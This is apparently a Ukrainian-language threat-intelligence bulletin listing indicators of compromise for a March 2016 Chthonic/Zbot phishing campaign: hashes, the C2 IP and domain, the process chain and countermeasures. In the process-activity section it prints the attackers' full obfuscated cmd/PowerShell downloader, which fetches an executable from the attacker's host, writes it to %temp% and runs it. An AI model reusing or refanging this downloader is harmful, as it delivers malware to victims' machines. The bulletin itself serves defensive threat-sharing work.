IOC_chthonic_160318

Доброго дня, панове.

Візьміть до уваги маркери ще по одній розсилці.

16го березня проходила розсилка шкідливого коду типу #chthonic (варіація #zbot).

Рівень загрози – середній. Для тих, хто уважно читає наші поради – низький.

Включили цей зразок в розсилку оскільки станом на сьогодні джерело досі активне.

Трохи аналітики:

• Враховуючи почерк цієї команди слід очікувати нових зразків із цим посиланням
• Цього разу сервер розповсюдження=серверу контролю (С2)
• Схема та сама – обфусковані JS скрипти в архіві, претекст та фейкові скани документів
• Скрипт чітко вказує одну адресу та ім’я, під яким payload записується на диск
• Завантаження основної частини засобами Powershell
• Основна частина по аналогії із #Zbot змінює контрольну суму та маскується під різні додатки
• Не потребує прав Адміністратора
• Цей домен та шлях завантаження уже використовувався 23/02
• В черговий раз звертаємо увагу на механізм WSH та PowerShell – якщо не застосовуєте, то обмежуйте

Схема атаки:

email > Attach (RAR) > JS > WSCRIPT > CMD > Powershell > single hardcoded URL >
' h11p:\vivedoc{.} ru\document/pax.exe' >  $env:temp + '\49552.exe

Маркери IOC:

Приєднання (архів):

SHA-256    78f7289a3e1967c5f6c3c756004801965f2b6944bd214fbca3d7744ffc7c595a
File name   договор и сканы Яковлевой по ТОВ РІДАН.rar
File size      71.36 KB

скрипт приманка:

SHA-256        f36f979625dd6e6b85a0d8e44d04b61f607ef2edcc3431916bf7c27cb63f17d4
File name   договір послуг №71-18р.xls.js
File size      34.3 KB

основна частина (джерело станом на 19/03):

SHA-256        31301e4353110752a224d936390ad3ccd59c399c0290800ef150cf8e989c4888
File name   pax.exe    >> $env:temp + '\49552.exe
File size      393.5 KB

Перший запуск:

SHA-256        e5791ceb76d0aa9dc177dc91ed76d3eb1c425bbca73fcdb3289a5cb29801a6db
File name   Mozillasync.exe
File size      393.5 KB

Другий запуск:

SHA-256        2fed4e7b0b103570df53e62ed428d36652c0ddb74e3dae7957574ab8379a681c
File name   StartXnView.exe
File size      393.5 KB

основна частина (джерело станом на 20/03):

SHA-256        288086fd96072b0023cb5b148d26786c919361d5e2649303968e1ceca71d1b30
File name   pax.exe
File size      312 KB

Мережеві IOC:

завантаження payload – станом на 20/03 досі активна!

92.63.197.13      vivedoc{.} ru      GET /document/pax.exe HTTP/1.1 HTTP 339        Mozilla/4.0 (compatible; MSIE 7.0)

трафік скомпрометованої системи – сервер контролю (так само як і минулого разу)

92.63.197.13      vivedoc{.} ru      POST /web/ HTTP/1.1   HTTP 551   Mozilla/7.1 (compatible; MSIE 7.1; Windows NT 6.2; SV1)
(Минулого разу – той самий, 92.63.197.13      honeyindoc{.} ru POST / HTTP/1.1  (application/x-www-form-urlencoded))

Зразок запускає декілька копій iexplorer та ініціює відволікаючі з’єднання:

explorer.exe       1952 TCP   10.0.2.15   49393        92.63.197.13      80        ESTABLISHED
explorer.exe       1952 TCP   10.0.2.15   49394        92.63.197.13      80        ESTABLISHED
iexplore.exe       2916 TCP   10.0.2.15   49390        204.79.197.200   80        ESTABLISHED
explorer.exe       1952 TCP   10.0.2.15   49397        172.217.20.196   80        ESTABLISHED
explorer.exe       1952 TCP   10.0.2.15   49398        172.217.20.196   443        ESTABLISHED
iexplore.exe       2916 TCP   10.0.2.15   49390        204.79.197.200   80        ESTABLISHED

Активність по процесам:

Запуск скрипта-приманки ініціює завантаження основної частини засобами Powershell

Кожен запуск призводить до запису основної частини у %temp% а потім зразок копіює себе у довільний каталог, залежно від додатку під який він мімікрує

“C:\Windows\System32\WScript.exe” “C:\Users\operator\Desktop\договір послуг №71-18р.xls.js”

“C:\Windows\System32\cmd.exe” /k set _a111=powe&& set _a222=rsh&& set _a333=ell&& call %_a111%%_a222%%_a333% $DuGgOVo = ‘yIqQkuk’;$a = ‘Msxml’ + ‘2.XML’ + ‘HTTP’;$avA3BE = ‘zjXOyL’;$b = ‘ADO’ + ‘DB.’ + ‘Stream’;$npo2cb = ‘AhLfy6’;$c = ‘G’ + ‘E’ + ‘T’;$xcVNsaFw = ‘tagBFRbq’;$d = 1 – 1 + 1;$nSQR1qd = ‘RhEGM’;$hr = New-Object -ComObject $a;$Tvcnch = ‘M7cerebf’;$ab = New-Object -ComObject $b;$oVDBm = ‘Y8DEr’;$path = $env:temp + ‘\49552.exe’;$YlhPo = ‘zrEVSXdB’;$hr.open($c, ‘h11p:\vivedoc{.} ru\document/pax.exe’, 0);$sHDPTRb5M = ‘TgRmj’;$hr.send();$MNhOwnbr = ‘xDJX0Z’;$ccUAdL = ‘JSsQEZQ’;$VR5pnoi = ‘piD7G6t’;$IY8gzg = ‘dZdYx’;$ab.open();$YODMbnR = ‘iIGrd’;$ab.type = $d;$ftUZAT = ‘uQk6v’;$ab.write($hr.responseBody);$MLKVm7Ki = ‘fQWbtv’;$ab.savetofile($path);$HyAX0Mlr = ‘tkvJU’;$ab.close();$NDnZ4YB = ‘NenMcXs’;$ayhTTR = ‘vtBgFL’;$bSBCCnkkL = ‘QaBQu’;$mLvCd5wn = ‘PkTPD’;$Wu3cZ0 = ‘nOP7DR’;$vJrAshn = ‘QvXmKwv’;$KfNmqt = ‘f9cKH3rw’;Start-Process $path;

powershell  $DuGgOVo = ‘yIqQkuk’;$a = ‘Msxml’ + ‘2.XML’ + ‘HTTP’;$avA3BE = ‘zjXOyL’;$b = ‘ADO’ + ‘DB.’ + ‘Stream’;$npo2cb = ‘AhLfy6’;$c = ‘G’ + ‘E’ + ‘T’;$xcVNsaFw = ‘tagBFRbq’;$d = 1 – 1 + 1;$nSQR1qd = ‘RhEGM’;$hr = New-Object -ComObject $a;$Tvcnch = ‘M7cerebf’;$ab = New-Object -ComObject $b;$oVDBm = ‘Y8DEr’;$path = $env:temp + ‘\49552.exe’;$YlhPo = ‘zrEVSXdB’;$hr.open($c, ‘h11p:\vivedoc{.} ru\document/pax.exe’, 0);$sHDPTRb5M = ‘TgRmj’;$hr.send();$MNhOwnbr = ‘xDJX0Z’;$ccUAdL = ‘JSsQEZQ’;$VR5pnoi = ‘piD7G6t’;$IY8gzg = ‘dZdYx’;$ab.open();$YODMbnR = ‘iIGrd’;$ab.type = $d;$ftUZAT = ‘uQk6v’;$ab.write($hr.responseBody);$MLKVm7Ki = ‘fQWbtv’;$ab.savetofile($path);$HyAX0Mlr = ‘tkvJU’;$ab.close();$NDnZ4YB = ‘NenMcXs’;$ayhTTR = ‘vtBgFL’;$bSBCCnkkL = ‘QaBQu’;$mLvCd5wn = ‘PkTPD’;$Wu3cZ0 = ‘nOP7DR’;$vJrAshn = ‘QvXmKwv’;$KfNmqt = ‘f9cKH3rw’;Start-Process $path;

“C:\Users\operator\AppData\Local\Temp\49552.exe“

“C:\Users\operator\AppData\Roaming\Mozilla\Mozillasync.exe“

“C:\Windows\system32\cmd.exe” /c “C:\Users\operator\AppData\Local\Temp\tmp31ff2b60.bat”

Закріплення через HCU (так само як і минулого разу)

Перший запуск
{E1E44CAA-17DF-58EA-6A9B-F8A8F27ED919}                 
c:\users\operator\appdata\roaming\mozilla\mozillasync.exe       1/19/2015 9:56 PM

Другий запуск
{77947C66-8A05-1E12-8FC2-D14DA2AE84DD}                        
c:\users\operator\appdata\roaming\xnview\startxnview.exe       1/19/2015 9:56 PM

Контрзаходи:

• Перевірка журналів мережевого обладнання по наданим маркерам
• Обмеження передачі запускних файлів по каналам Web та Email (payload не кодований)
• Чіткий контроль та блокування спроб зміни списку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
• Блокування доступу до мережі Інтернет для процесу Powershell (варіант 1й)
• Деактивація механізму Windows Script Host (варіант 2й)
• Якщо ж Powershell активно застосовується – нагадую про вбудовані можливості McAfee ENS – сигнатури Exploit Prevention
• Заборона створення та зчитування/запуску *.JS, *.VBS, *.EXE з каталогів профілю C:\Users\**\ !
• Заборона виклику Powershell через WSCript – додатково захистить від скриптів що йдуть як OLE об’єкти
• Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
• Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
• Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR